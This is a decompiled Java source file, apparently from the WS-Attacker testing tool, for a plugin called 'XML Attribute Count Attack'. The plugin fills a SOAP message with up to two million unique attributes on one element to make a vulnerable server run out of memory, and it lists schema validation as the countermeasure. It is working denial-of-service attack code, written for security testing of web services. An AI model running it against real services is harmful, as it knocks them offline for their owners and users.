/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos;

import java.util.HashMap;
import java.util.Map;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionInteger;
import wsattacker.main.plugin.option.OptionLimitedInteger;
import wsattacker.plugin.dos.dosExtension.abstractPlugin.AbstractDosPlugin;
import wsattacker.plugin.dos.dosExtension.option.OptionTextAreaSoapMessage;

public class XmlAttributeCount
extends AbstractDosPlugin {
    private static final long serialVersionUID = 1L;
    private AbstractOptionInteger optionNumberAttributes;

    @Override
    public void initializeDosPlugin() {
        this.initData();
        this.optionNumberAttributes = new OptionLimitedInteger("Number of attributes", 25000, "The number of attributes placed in the message.", 1, 2000000);
        this.getPluginOptions().add((AbstractOption)this.optionNumberAttributes);
    }

    @Override
    public OptionTextAreaSoapMessage.PayloadPosition getPayloadPosition() {
        return OptionTextAreaSoapMessage.PayloadPosition.HEADERLASTCHILDELEMENTATTRIBUTES;
    }

    public AbstractOptionInteger getOptionNumberAttributes() {
        return this.optionNumberAttributes;
    }

    public void initData() {
        this.setName("XML Attribute Count Attack");
        this.setDescription("<html><p>This attack checks wheter or not a Web service is vulnerable to the \"XML Attribute Count Attack\"</p><p>A vulnerable server will run out of memory when parsing an XML document with a high attribute count for a single element</p><p>The attack algorithm replaces the string $$PAYLOADATTR$$ in the SOAP message below with the defined number of unique attributes.</p><p>The placeholder $$PAYLOADATTR$$ can be set to any other position in the SOAP message.</p></html>");
        this.setCountermeasures("In order to counter the attack limit the number of attributes of an element.\n This can be achived using XML schema validation.");
    }

    @Override
    public void createTamperedRequest() {
        StringBuilder sb = new StringBuilder();
        sb.append("");
        for (int i = 0; i < this.optionNumberAttributes.getValue(); ++i) {
            sb.append(" a" + i + "=\"" + i + "\"");
        }
        String soapMessage = this.getOptionTextAreaSoapMessage().getValue();
        String soapMessageFinal = this.getOptionTextAreaSoapMessage().replacePlaceholderWithPayload(soapMessage, sb.toString());
        HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
        for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
            httpHeaderMap.put(entry.getKey(), entry.getValue());
        }
        this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), soapMessageFinal);
    }
}

